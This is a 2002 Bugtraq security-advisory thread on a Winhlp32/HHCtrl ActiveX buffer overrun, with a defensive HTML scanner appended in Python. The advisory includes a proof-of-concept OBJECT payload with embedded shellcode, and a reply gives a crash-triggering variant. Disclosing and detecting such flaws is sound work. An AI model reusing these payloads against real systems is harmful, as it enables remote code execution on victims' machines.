From: Mark Litchfield (mark_at_ngssoftware.com)
Date: Tue Aug 06 2002 - 14:23:38 CDT
If I am not mistaken, I believe that Microsoft are aware of this issue and
have an IE patch coming out very shortly. My brother reported this to
them, please see http://www.nextgenss.com/vna/ms-whelp.txt
Regards
Cheers,
Mark Litchfield
----- Original Message -----
From: "Jelmer" <jelmer_at_kuperus.xs4all.nl>
To: "Next Generation Insight Security Research Team" <mark_at_ngssoftware.com>;
<bugtraq_at_securityfocus.com>; <ntbugtraq_at_listser.ntbugtraq.com>
Sent: Thursday, August 01, 2002 5:19 PM
Subject: Re: Winhelp32 Remote Buffer Overrun
> I just installed servicepack 3 and the following code still crashed my
> IE6 with a memory could not be referenced error.
>
> <OBJECT ID=hhctrl TYPE="application/x-oleobject"
> CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
> <PARAM name="Command" value="Shortcut">
> <PARAM name="Button" value="Bitmap:shortcut">
> <PARAM name="Item1" value=",,">
> <PARAM name="Item2" value="273,1,1">
> <PARAM name="codebase" value="">
> <PARAM name="Font" value=" A VERY VERY LONG STRING ">
> </OBJECT>
>
> I have been told this means it is most likely exploitable. I am not into
> buffer overflows myself though, maybe someone can confirm this. Anyways I
> notified Microsoft of this several months ago. The day after I notified
> them someone pointed me to the ngssoftware advisory *sob*, and I notified
> Microsoft that this was probably the same issue, last I heard from them
> they were looking into whether this was indeed the case. It's been several
> months and as far as I know they are still looking.
>
> --
> jelmer
>
> ----- Original Message -----
> From: "Next Generation Insight Security Research Team"
> <mark_at_ngssoftware.com>
> To: <bugtraq_at_securityfocus.com>; <ntbugtraq_at_listser.ntbugtraq.com>
> Sent: Friday, August 02, 2002 3:59 AM
> Subject: Winhelp32 Remote Buffer Overrun
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > NGSSoftware Insight Security Research Advisory
> >
> > Name: Winhlp32.exe Remote Buffer Overrun
> > Systems Affected: Win2K Platform
> > Severity: Critical
> > Category: Remote Buffer Overrun
> > Vendor URL: http://www.mircosoft.com
> > Author: Mark Litchfield (mark_at_ngssoftware.com)
> > Date: 1st August 2002
> > Advisory number: #NISR01082002
> >
> >
> > Description
> > ***********
> >
> > Many of the features available in HTML Help are implemented through
> > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
> > control is used to provide navigation features (such as a table of
> > contents), to display secondary windows and pop-up definitions, and
> > to provide other features. The HTML Help ActiveX control can be used
> > from topics in a compiled Help system as well as from HTML pages
> > displayed in a Web browser. The functionality provided by the HTML
> > Help ActiveX control will run in the HTML Help Viewer or in any
> > browser that supports ActiveX technology, such as Internet Explorer
> > (version 3.01 or later). Some features, as with the WinHlp Command,
> > provided by the HTML Help ActiveX control are meant to be available
> > only when it is used from a compiled HTML Help file (.chm) that is
> > displayed by using the HTML Help Viewer.
> >
> > Details
> > *******
> >
> > Winhlp32.exe is vulnerable to a buffer overrun attack using the Item
> > parameter within the WinHlp Command. The item parameter is used to
> > specify the file path of the WinHelp (.hlp) file in which the WinHelp
> > topic is stored, and the window name of the target window. Using
> > this overrun, an attacker can successfully execute arbitrary code on
> > a remote system by either encouraging the victim to visit a
> > particular web page, whereby code would execute automatically, or by
> > including the exploit within the source of an email. In regards to
> > email, execution would automatically occur when the mail appears in
> > the preview pane and ActiveX objects are allowed (This is allowed by
> > default, the Internet Security Settings would have to be set as HIGH
> > to prevent execution of this vulnerability). Any exploit would
> > execute in the context of the logged on user.
> >
> > Visual POC Exploit
> > ******************
> >
> > This POC will simply display Calculator. Please note that this was
> > written on a Win2k PC with SP2 installed. I have not tested it on
> > anything else.
> >
> > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
> > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
> > type=application/x-oleobject width=0><PARAM NAME="Width"
> > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
> > VALUE="WinHelp"><PARAM NAME="Item1"
> > VALUE="3ĄPhcalc4$ƒĄPVøÆ§éw’Š3ĄP¾”éw’ÖAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
> > PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒĘ’ęgMyWindow"><PARAM
> > NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
> > <SCRIPT>winhelp.HHClick()</SCRIPT>
> >
> >
> > Fix Information
> > ***************
> >
> > NGSSoftware alerted Microsoft to these problems on the 6th March
> > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
> > as the fix has been built into this service pack found at
> > http://www.microsoft.com
> > An alternative to these patches would be to ensure the security
> > settings found in the Internet Options are set to High. Despite the
> > Medium setting, stating that unsigned ActiveX controls will not be
> > downloaded, Kylie will still execute Calc.exe. Another alternative
> > would be to remove winhlp32.exe if it is not required within your
> > environment.
> > A check for these issues has been added to Typhon II, of which more
> > information is available from the
> > NGSSoftware website, http://www.ngssoftware.com.
> >
> > Further Information
> > *******************
> >
> > For further information about the scope and effects of buffer
> > overflows, please see
> >
> > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
> > http://www.ngssoftware.com/papers/ntbufferoverflow.html
> > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
> > http://www.ngssoftware.com/papers/unicodebo.pdf
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
> >
> > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
> > a+qSkYWrz7uspZcqqRTc2r0C
> > =2PKN
> > -----END PGP SIGNATURE-----
> >
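The advisory above describes the risky shape of this issue in HTML terms: an OBJECT element instantiating the HTML Help ActiveX control (the CLSID is the one quoted in the thread), a Command of WinHelp (or, in Jelmer's variant, Shortcut) and a PARAM value far longer than any legitimate .hlp path or window name. The scanner below turns that description into a content-inspection check a defender could run over inbound HTML or mail bodies before they reach a browser or preview pane. It is an added example, not part of the thread and not the Typhon II check mentioned in the advisory; the 128-character threshold, the set of flagged commands, the `Finding` structure and the `scan` function name are all assumptions made here, and both sample documents are constructed for the example.

```python
import html.parser
from dataclasses import dataclass

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), as quoted in the advisory.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Commands the thread shows being abused (assumption: these are the ones worth flagging).
RISKY_COMMANDS = {"winhelp", "shortcut"}
# Assumed threshold: a legitimate .hlp path or window name is short; longer values are suspect.
MAX_SANE_PARAM_LEN = 128


@dataclass
class Finding:
    object_id: str      # the OBJECT's id attribute, if any
    command: str        # the Command PARAM, lower-cased
    oversized: list     # [(param_name, length), ...] for values over the threshold


class HHCtrlScanner(html.parser.HTMLParser):
    """Collects PARAMs of every OBJECT that instantiates HHCtrl and evaluates them on close."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_hhctrl = False
        self._obj_id = ""
        self._params = {}

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases attribute names; values keep their case, so normalise here.
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{}")
            self._in_hhctrl = clsid == HHCTRL_CLSID
            self._obj_id = a.get("id", "")
            self._params = {}
        elif tag == "param" and self._in_hhctrl:
            self._params[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._in_hhctrl:
            self._evaluate()
            self._in_hhctrl = False

    def _evaluate(self):
        command = self._params.get("command", "").lower()
        oversized = [(n, len(v)) for n, v in self._params.items()
                     if len(v) > MAX_SANE_PARAM_LEN]
        # Flag the risky commands outright (they are meant for compiled .chm files, not web
        # pages or mail) and any HHCtrl use that carries an oversized parameter.
        if command in RISKY_COMMANDS or oversized:
            self.findings.append(Finding(self._obj_id, command, oversized))


def scan(html_text):
    """Return a list of Finding objects for suspicious HHCtrl OBJECTs in html_text."""
    p = HHCtrlScanner()
    p.feed(html_text)
    p.close()
    return p.findings


# Constructed sample: HHCtrl used with short parameters, as a help page might.
BENIGN = (
    '<OBJECT id=nav classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11" '
    'type="application/x-oleobject">'
    '<PARAM name="Command" value="Contents">'
    '<PARAM name="Item1" value="help.hhc">'
    '</OBJECT>'
)

# Constructed sample shaped like the reports in the thread: unquoted attributes, the WinHelp
# command and an Item1 value padded far beyond any plausible path or window name.
SUSPECT = (
    '<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 id=winhelp '
    'type=application/x-oleobject>'
    '<PARAM NAME="Command" VALUE="WinHelp">'
    '<PARAM NAME="Item1" VALUE="' + "A" * 300 + 'MyWindow">'
    '<PARAM NAME="Item2" VALUE="x"></OBJECT>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan(doc))
```

The check is deliberately structural rather than signature-based: it keys on the control's CLSID and on parameter shape, so a page that reorders or re-cases the attributes, or uses the Shortcut command with a long Font value as in the second report, is caught the same way. It only inspects HTML; it does nothing about the control being reachable in the first place, for which the advisory's own mitigations (the service pack, the High security setting, or removing winhlp32.exe) still apply.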